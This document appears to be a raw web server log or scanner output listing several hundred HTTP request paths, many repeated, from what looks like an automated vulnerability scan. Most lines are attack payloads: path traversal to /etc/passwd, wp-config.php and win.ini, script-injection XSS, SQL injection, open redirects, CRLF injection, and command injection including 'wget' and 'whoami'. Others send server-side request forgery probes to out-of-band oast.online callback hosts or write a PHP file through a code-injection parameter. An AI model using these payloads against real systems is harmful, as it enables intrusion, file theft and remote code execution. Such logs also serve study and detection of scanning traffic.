/web/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
/web/casmain.xgi
/web/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
/web/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7
/web/register/?redirect_to=https://example.com/
/web/?piereg_logout_url=true&redirect_to=https://example.com
/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/web/resin-doc/viewfile/?file=index.jsp
/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
/web/%20../web-inf/
/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/../../../../../../../../../../../../../etc/passwd
/web/gotoURL.asp?url=google.com&id=43569
/web/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
/web/WAN_wan.htm?.gif
/web/index.php?s=Admin-Data-down&id=../../Conf/config.php
/web/him/api/rest/V1.0/system/log/list?filePath=../
/web
/web/jars/upload
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/wp-admin/install.php
/web/upload/UploadResourcePic.ashx?ResourceID=8382
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/wp-login.php?action=register
/web/wp-admin/maint/repair.php
/web/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
/web/xmlrpc.php
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/web/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7
/web/casmain.xgi
/web/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E
/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/web/resin-doc/viewfile/?file=index.jsp
/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
/web/../../../../../../../../../../../../../etc/passwd
/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
/web/jars/upload
/web/WAN_wan.htm?.gif
/web/him/api/rest/V1.0/system/log/list?filePath=../
/web
/web/wp-admin/install.php
/web/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
/web/index.php?s=Admin-Data-down&id=../../Conf/config.php
/web/upload/UploadResourcePic.ashx?ResourceID=8382
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/%20../web-inf/
/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
/web/docpicker/internal_proxy/http/example.com
/web/wt3/forceSave.php?file=/etc/passwd
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/v2/query
/web/WAN_wan.htm?.gif
/web/xmlrpc.php
/web/register/?redirect_to=https://example.com/
/web/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/web/?mdocs-img-preview=../../../wp-config.php
/web/rootDesc.xml
/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wt3/forceSave.php?file=/etc/passwd
/web/docpicker/internal_proxy/http/example.com
/web/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E
/web/wp-content/uploads/affwp-debug.log
/web/WAN_wan.htm?.gif
/web/v2/query
/web/plugins/weathermap/configs/poc.conf
/web/guest_auth/guestIsUp.php
/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
/web/
/web/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/wps/PA_WCM_Authoring_UI/proxy/http/example.com
/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/auth/realms/master/clients-registrations/openid-connect
/web/wp-content/plugins/1-flash-gallery/
/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
/web/./../../../../../../../../../../windows/win.ini
/web/wp-content/plugins/easy-media-gallery-pro/
/web/login.php
/web/(download)/tmp/poc.txt
/web/wp-content/uploads/pdf-invoices/
/web/search.php?searchtype=5
/web/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==
/web/rootDesc.xml
/web/download.php?file=/etc/passwd
/web/fpui/loginServlet
/web/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//
/web/%3Cscript%3Ealert(document.domain)%3C/script%3E
/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/web/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E
/web/wp-content/uploads/affwp-debug.log
/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/web/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
/web/guest_auth/guestIsUp.php
/web/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/plugins/weathermap/configs/poc.conf
/web/wps/PA_WCM_Authoring_UI/proxy/http/example.com
/web
/web/wp-content/plugins/1-flash-gallery/
/web/./../../../../../../../../../../windows/win.ini
/web/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
/web/wp-content/plugins/easy-media-gallery-pro/
/web/auth/realms/master/clients-registrations/openid-connect
/web/login.php
/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/uploads/pdf-invoices/
/web/search.php?searchtype=5
/web/(download)/tmp/poc.txt
/web/download.php?file=/etc/passwd
/web/fpui/loginServlet
/web/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//
/web/%3Cscript%3Ealert(document.domain)%3C/script%3E
/web/rest/api/2/resolution
/web/?noptin_ns=email_click&to=https://example.com
/web/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/web/blog/wp-content/plugins/1-flash-gallery/
/web/wp-content/plugins/redirection/
/web/yyoa/ext/https/getSessionList.jsp?cmd=getAll
/web/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd
/web/sap/public/bc/icf/logoff?redirecturl=https://example.com
/web/password.cgi
/web/ispirit/interface/gateway.php
/web/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D
/web/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/rest/api/2/projectCategory?maxResults=1000
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acjap9m8v98g1htghgcekcuceyyyyyr.oast.online
/web/
/web/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx
/web/?u=http://c8acjap9m8v98g1htghgcekcuceyyyyyg.oast.online/&href=http://c8acjap9m8v98g1htghgcekcuceyyyyye.oast.online/&action=http://c8acjap9m8v98g1htghgcekcuceyyyyyk.oast.online/&host=c8acjap9m8v98g1htghgcekcuceyyyyyc.oast.online&http_host=c8acjap9m8v98g1htghgcekcuceyyyyyq.oast.online&email=root@c8acjap9m8v98g1htghgcekcuceyyyyyo.oast.online&url=http://c8acjap9m8v98g1htghgcekcuceyyyyy1.oast.online/&load=http://c8acjap9m8v98g1htghgcekcuceyyyyyw.oast.online/&preview=http://c8acjap9m8v98g1htghgcekcuceyyyyys.oast.online/&target=http://c8acjap9m8v98g1htghgcekcuceyyyyya.oast.online/&proxy=http://c8acjap9m8v98g1htghgcekcuceyyyyy4.oast.online/&from=http://c8acjap9m8v98g1htghgcekcuceyyyyyh.oast.online/&src=http://c8acjap9m8v98g1htghgcekcuceyyyyy6.oast.online/&ref=http://c8acjap9m8v98g1htghgcekcuceyyyyby.oast.online/&referrer=http://c8acjap9m8v98g1htghgcekcuceyyyybn.oast.online/
/web/guest_auth/poc.php?cmd=cat%20/etc/passwd
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/./../../../../../../../../../../etc/passwd
/web/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/web/images/..%2fapply_abstract.cgi
/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27
/web/eam/vib?id=/etc/issue
/web/index.php?plot=;wget%20http://c8acjap9m8v98g1htghgcekcuceyyyybe.oast.online
/web/rest/api/2/screens
/web/wp-content/plugins/ultimate-member/
/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))
/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=
/web
/web/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd
/web/rest/api/2/resolution
/web/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''
/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/blog/wp-content/plugins/1-flash-gallery/
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/web/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/web/yyoa/ext/https/getSessionList.jsp?cmd=getAll
/web/wp-content/plugins/redirection/
/web/wp-content/uploads/
/web/sap/public/bc/icf/logoff?redirecturl=https://example.com
/web/ispirit/interface/gateway.php
/web/password.cgi
/web/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)
/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini
/web/debug.php
/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D
/web/users/sign_in
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/rest/api/2/projectCategory?maxResults=1000
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acjap9m8v98g1htghgcekcuceyyyyyr.oast.online
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/images/..%2fapply_abstract.cgi
/web/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/web/./../../../../../../../../../../etc/passwd
/web/rest/api/2/screens
/web/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=
/web/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd
/web/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/wp-content/themes/
/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/login.php/'%3E%3Csvg/onload=alert%6025SnmIcLC4GSscMcQ5BS8qEsUML%60%3E
/web/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))
/web/db_dump.php
/web/cgi-bin/login.cgi
/web/wp-includes/ALFA_DATA/
/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/ui/login.php?user=admin
/web/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/
/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/web/script/
/web/include/thumb.php?dir=http/.....///.....///config/config_db.php
/web/index.php?m=member&f=login_save
/web/xmlrpc.php
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini
/web/stat.jsp?cmd=chcp+437+%7c+dir
/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/force-download.php?file=../wp-config.php
/web/
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnmJujIVh1aSQnDamnPs1WzFH.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B
/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
/web/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/
/web/?aam-media=wp-config.php
/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
/web/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery
/web/blog/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/dev/tests/functional/credentials.xml.dist
/web/users/sign_in
/web/wp-json/oembed/1.0/proxy?url=http://c8acjap9m8v98g1htghgcekcucayyyybq.oast.online/
/web/wp-content/themes/altair/modules/
/web/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'
/web/wp-content/themes/altair/functions/
/web/wp-content/themes/altair/images/flip/
/web/wp-content/themes/altair/images/
/web/ui/api/v1/global-search/builds?jfLoader=true
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/wp-content/themes/
/web/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/web/login.php/'%3E%3Csvg/onload=alert%6025SnmIcLC4GSscMcQ5BS8qEsUML%60%3E
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/ui/login.php?user=admin
/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/web/rest/menu/latest/admin
/web/db_dump.php
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/script/
/web/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
/web/wp-content/plugins/
/web
/web/blog/wp-content/themes/haberadam/api/mobile-info.php?id=
/web/cgi-bin/login.cgi
/web/index.php?m=member&f=login_save
/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnmJujIVh1aSQnDamnPs1WzFH.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B
/web/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/
/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/dev/tests/functional/credentials.xml.dist
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini
/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
/web
/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
/web/Upload/upload_file.php?l=test
/web/website/lang/en_US?r=https://example.com/
/web/wp-content/plugins/.git/config
/web/include/thumb.php?dir=http\\..\\..\\config\\config_db.php
/web/ALFA_DATA/alfacgiapi/
/web/solr/admin/cores?wt=json
/web/wp-json/oembed/1.0/proxy?url=http://c8acjap9m8v98g1htghgcekcucayyyybq.oast.online/
/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/
/web/fpui/jsp/index.jsp
/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E
/web/dev/tests/functional/etc/config.xml.dist
/web/v1/agent/service/register
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
/web/25SnmJujIVh1aSQnDamnPs1WzFH.php
/web/wp-content/plugins/
/web
/web/wp-content/themes/.git/config
/web/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/rest/menu/latest/admin
/web/website/lang/en_US?r=https://example.com/
/web/wp-includes/
/web/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500
/web/cgi-bin/status
/web/Upload/test/test.php
/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com
/web/ui/api/v1/global-search/builds?jfLoader=true
/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/
/web/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
/web/v1/submissions
/web/download?type=files&filename=../../../../../../../../etc/passwd
/web/%0ASet-Cookie:crlfinjection=crlfinjection
http://c8acjap9m8v98g1htghgcekcupoyyyyba.oast.online/
/web/php/ping.php
/web/?author=1
/web/fpui/jsp/index.jsp
/web/feed/rdf
/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E
/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/web/v1/agent/service/register
/web/25SnmJujIVh1aSQnDamnPs1WzFH.php
/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
/web/?mel=9
/web/dev/tests/functional/etc/config.xml.dist
/web/cgi-bin/ALFA_DATA/alfacgiapi/
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
/web/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml
/web/wp-content/themes/.git/config
/web/wp-includes/
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('25SnmKjtf5X54AnPR9KjAnYOCaj')%3E
/web/wp-content/plugins/iwp-client/
/web/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com
/web/feed/rdf
/web/download?type=files&filename=../../../../../../../../etc/passwd
/web/%0ASet-Cookie:crlfinjection=crlfinjection
/web/cgi-bin/status
/web/php/ping.php
/web/v1/submissions
/web/Upload/test/test.php
/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/web/cgi-bin/ALFA_DATA/alfacgiapi/
/web/
/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/web/?author=1
/web/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/sys/ui/extend/varkind/custom.jsp
/web/wp-content/plugins/iwp-client/
/web/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml
/web/index.php?s=/home/page/uploadImg
/web/asynchPeople/
/web/download.php?file=../../../../../etc/passwd
/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
/web/http/index.php
@c8acjap9m8v98g1htghgcekcuqeyyyybh.oast.online/
/web/dashboard/proc.php?type=login
/web/lan.html
/web/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/wp-content/uploads/data.txt
/web/?mel=9
/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/web/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini
/web/wp-config.php
/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
c8acjap9m8v98g1htghgcekcuqayyyyb6.oast.online:80/
/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/web/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/wp-content/plugins/elementor/
/web/
/web/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('25SnmLk9MNa72UAISlihXxDaZJE')%3elujb7/admin/imgProcess.cfm
/web/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
